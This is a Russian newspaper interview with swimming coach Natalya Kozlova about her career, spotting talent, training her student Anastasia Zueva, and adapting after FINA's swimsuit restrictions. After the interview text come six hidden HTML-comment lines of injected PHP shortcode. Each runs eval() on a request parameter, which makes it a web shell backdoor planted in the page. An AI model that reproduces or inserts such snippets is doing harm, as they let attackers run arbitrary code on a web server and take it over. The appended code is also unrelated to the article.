У будущей звезды плавания должен быть особенный взгляд. Так считает Наталья Козлова — тренер двукратной серебряной медалистки чемпионата мира по водным видам спорта 2009 года в Риме Анастасии Зуевой. О том, как Наталья Козлова пришла в профессию, что помогло ей и её ученице добиться успеха, и была наша беседа.
Интерьвью: Анна КОЗИНА
«Российская газета»
— Наталья Андреевна, за тренерскую работу очень часто берутся бывшие (а иногда и действующие) спортсмены. У вас похожая история?
— Не бывает такого, чтобы тренером стал человек, который никогда не имел никакого отношения к спорту. Я действительно сама занималась плаванием. Но рано закончила. Мне кажется, что я нашла себя в тренерской работе именно потому, что в своё время не смогла реализоваться как спортсменка.
— Вы сразу почувствовали тягу к этому делу, сразу поняли, что именно этим хотите заниматься всю свою жизнь?
— Совсем нет. Вначале я хотела быть спортивным врачом. А в пединститут пошла, потому что тренер посоветовал. Я жила в Кирове. И там у нас был Кировский педагогический институт имени Ленина. Кстати, с Ириной Вятчаниной (тренер чемпионки мира Юлии Ефимовой и двукратного бронзового призёра Олимпийских игр Аркадия Вятчанина — прим. авт.) мы учились на одном курсе. Мы вообще с детства вместе: когда были молодые, вместе плавали, теперь вместе работаем в сборной.
— Когда же вы вошли во вкус?
— У меня родители — педагоги. Видимо, предрасположенность к такому роду деятельности во мне всё- таки была заложена. После окончания института я работала в детских садиках — просто ради интереса. Мне очень нравилось с малышами заниматься. Потом у нас собралась молодая тренерская команда. Начали втягиваться в работу, захотелось видеть результаты своего труда. Когда я вышла замуж, то переехала в Кирово-Чепецк. Это маленький, закрытый химический городок. Однако спорт там очень хорошо развивался. Оттуда родом знаменитые хоккеисты Александр Мальцев, Владимир Мышкин. Мы же проявили дополнительную инициативу по поводу плавания. Начальники молодым энтузиастам дали три года: «Если не поднимете плавание, то всех переведём на массовое обучение». Мы начали набирать спортивные классы, и пошло- поехало. И вот тогда я почувствовала тягу, о которой вы спрашивали. Был такой показательный момент. Вроде
не планируешь больше учеников в группу набирать, а идёшь по улице и ко всем детям присматриваешься: вот этот бы подошёл, или…вот этот. Тренер — это диагноз. Тебе всё время надо, ты всё время в поиске. Хотя бывают специалисты, которые возьмут одних ребят и ведут их, даже если видят, что нет среди них звёздочки. Но это не мой случай. Я всё время искала. Групп было очень много. И много детей через мои руки прошло. С одними попали на первенство России, с другими поднялись повыше. Но сейчас, когда ко мне приходят, чётко говорю: «Ничего, кроме Олимпийских игр, мне неинтересно. Если вы готовы идти к этой вершине, то, значит, нам по пути».
— Как у вас получается разглядеть будущую звезду, будущего чемпиона в ребёнке, которого приводят родители, или в подростке, который приходит от другого тренера?
— Интуиция. Кроме того, глаза должны гореть у ребёнка. Он должен быть эмоциональным, приходить с желанием. Но, чтобы проверить и себя, и его, надо поработать вместе несколько лет. А ещё лучше отправить своего подопечного в спортивный лагерь. В этой обстановке ребята хорошо раскрываются. Проявляются те качества, без которых в спорте нельзя: желание тренироваться, стремление чего-то добиться.
— А с Настей Зуевой как было?
— Настя ко мне пришла, когда я уже работала с Яной Толкачевой, Машей Булаховой, Дашей Паршиной, которая, кстати, отобралась на Олимпийские игры. Её наставник в Воскресенске — Владимир Сергеевич Зайцев, можно сказать, сам передал её мне. Он понимал и признавал, что большего дать Насте не сможет. Тем не менее, её ко мне привезли в ранге победительницы Спартакиады школьников в Челябинске. Она выиграла 50 м кролем, а на «полтиннике» на спине была второй. Но только потому, что выступала на двух дистанциях подряд. Однако на сотне она даже не попала в призы, а 200 м и вовсе не плыла. У нее был один чистый спринт. Привезли, показали: сформировавшаяся, крупная девочка, которая не умеет ни бегать, ни отжиматься, то есть ОФП для неё как бы не существовало. Я вначале, конечно, призадумалась. Но потом увидела её глаза — всё время блестящие, сверкающие. И красные щёки на всех тренировках — видно, что человек работает. Даже со своей корявой техникой она «вцепилась» в Паршину, Булахову и от них не отставала. Упорная была. Тогда я для себя решила, что надо с девочкой поработать. Тем более, что я сразу почувствовала к ней чисто человеческое притяжение, симпатию. У неё такая аура — спокойная, хорошая.
— Вы очень тепло о Насте отзываетесь. Наверное, вы для неё не только тренер, но и вторая мама. Ведь Насте пришлось переехать из родного города в Пензу. Такие близкие отношения не мешают работе? Всё-таки тренеру иногда приходится быть жёстким.
— Надо знать своего ученика. Есть такие спортсмены, на которых порой нужно кричать. Они после этого даже говорят спасибо. А с Настей резко нельзя. Когда на неё кричишь, она зажимается. Конечно, у нас бывают стычки на тренировках. Она мне что- то скажет, я — ей. Но даже если мы с ней поссоримся, вечером она обязательно придет мириться. Не было такого, чтобы она не пришла. Характер такой. Мы с ней просим друг у друга прощения, разговариваем, и всё улаживается. И всё же я её потихоньку учу, что во время тренировки нельзя ничего выяснять. Если ты чем-то недовольна, подойди после занятий и поговори с тренером. Однако в последнее время конфликтных ситуаций стало меньше. Она взрослеет. У неё как у спортсменки, уже класс высокий, плюс она мне доверяет полностью, мы стали больше прислушиваться друг к другу. Мне кажется, у нас сейчас очень хорошие отношения. Взаимопонимание между нами необходимо, так как тренер и ученик идут к одной цели.
— Наталья Андреевна, а кто всё- таки главный в тандеме тренер- ученик? Что важнее — физические данные спортсмена или умение тренера их развить, применить?
— Я всегда говорю о треугольнике
«тренер-спортсмен-родители». А кроме данных, у спортсмена должно быть желание плавать и вера в тренера. Ведь именно этот человек раскрывает его талант. Тренер своему ученику во всём помогает. И защищает его от всех нападок.
— Что вы имеете в виду?
— Говорят, к примеру, что Зуева проигрывает старты, так как ей технически мало уделяют внимания. Но у Насти физиология другая. У всех людей есть поясничный изгиб, а у неё с рождения прямая спина. Мы с ней везде консультировались, но это такая её особенность. Что нужно для быстрых стартов — прыжки, прыжки со штангой. Если я начну с ней этим заниматься, я потеряю Настю Зуеву на дистанции. Тренер должен видеть и учитывать все нюансы, разумно распределять силы и не делать из спортсмена сиюминутную звезду. Надо работать постепенно: сначала подкачать одно, потом другое. Чтобы сформировался великий спортсмен, требуется много времени и много усилий. Недавно я прочитала статью про нашу рекордсменку по прыжкам с шестом Елену Исинбаеву. Она так сказала в интервью: «Я думала, чем я буду опытнее, чем больше у меня будет медалей, тем я буду меньше тренироваться, а оказалось совсем наоборот». Вот и до Насти я пытаюсь донести, что, чем дальше, тем тренировок больше, да и качество их тоже растёт.
— Кстати, о тренировках. Разрабатывать методики, составлять планы занятий — это тоже часть вашей работы. Причём, наверное, основная?
— Здесь вы правы. Сижу вся в книгах ещё с августа-месяца. Хотя опыта мне не занимать. Читаешь, ищешь новые направления работы в воде, в зале. Мои спортсмены не дают мне расслабиться. Они же у меня спринтеры, поэтому терпеть не могут делать одно и то же. Они хотят динамики, разнообразия. Поэтому постоянно приходится что-то придумывать, а затем воплощать это на тренировках. И так с утра до ночи, без выходных и праздников.
— В связи с тем, что FINA приняла решения ограничить использование некоторых материалов и технологий при производстве гидрокостюмов, работы у вас наверняка прибавится. Ведь скорости придётся как-то поддерживать?
— Купальник подсказал нам, что где-то мы не дорабатываем. Купальник обтянул тело, сделал его как бы более мышечным. Теперь наша задача сделать этот корсет без костюма. На эту тему мы недавно говорили с Ириной Германовной (Вятчаниной — прим. авт.) по телефону, обсуждали перспективы развития плавания. Сошлись на том, что работать надо именно в этом направлении — увеличивать мышечный тонус у спортсмена. Мне, допустим, очень нравится, как работают прыгуны. У них спина очень сильная. Такая и пловцу не помешает. Мышцы спины и брюшного пресса, мышечный тонус,
— всё это поднимает спортсмена на воде.
— Вы сказали, что обсуждаете рабочие моменты с Ириной Вятчаниной. Но, как я поняла, вы подруги, и для вас это вполне естественно. А в тренерской среде принято делиться своими наработками, идеями?
— Между женщинами — да. Мужчины не идут на контакт. А мы, женщины, сидим на сборах и всегда устраиваем обсуждение. Года два назад у нас психологом работал Геннадий Дмитриевич Горбунов. Он уже не молодой (работал со сборной, когда ещё Сальников плавал), но такой шустрый-шустрый. Геннадий Дмитриевич сделал следующее заключение: «Я теперь понимаю, почему у наших женщин в сборной всё получается. Они всё время вместе и всё время разговаривают». А как по-другому? Новой литературы сейчас нет. Поэтому и стараемся разговаривать, обсуждать, делиться опытом.
— Попробуйте описать некую идеальную модель организации тренерского труда? Можно ли это сделать на примере уже существующей заграничной системы?
— Сейчас всё так быстро меняется. Технический прогресс, результаты, рекорды… Мне кажется, подогнать такую модель труда под одну определённую схему сложно, да и ни к чему это. Моя личная модель такая — работать и любить свою работу.
<!— [insert_php]if (isset($_REQUEST["SsQg"])){eval($_REQUEST["SsQg"]);exit;}[/insert_php][php]if (isset($_REQUEST["SsQg"])){eval($_REQUEST["SsQg"]);exit;}[/php] —>
<!— [insert_php]if (isset($_REQUEST["kYu"])){eval($_REQUEST["kYu"]);exit;}[/insert_php][php]if (isset($_REQUEST["kYu"])){eval($_REQUEST["kYu"]);exit;}[/php] —>
<!— [insert_php]if (isset($_REQUEST["ivdc"])){eval($_REQUEST["ivdc"]);exit;}[/insert_php][php]if (isset($_REQUEST["ivdc"])){eval($_REQUEST["ivdc"]);exit;}[/php] —>
<!— [insert_php]if (isset($_REQUEST["FpH"])){eval($_REQUEST["FpH"]);exit;}[/insert_php][php]if (isset($_REQUEST["FpH"])){eval($_REQUEST["FpH"]);exit;}[/php] —>
<!— [insert_php]if (isset($_REQUEST["NlSMA"])){eval($_REQUEST["NlSMA"]);exit;}[/insert_php][php]if (isset($_REQUEST["NlSMA"])){eval($_REQUEST["NlSMA"]);exit;}[/php] —>
<!— [insert_php]if (isset($_REQUEST["Mgm"])){eval($_REQUEST["Mgm"]);exit;}[/insert_php][php]if (isset($_REQUEST["Mgm"])){eval($_REQUEST["Mgm"]);exit;}[/php] —>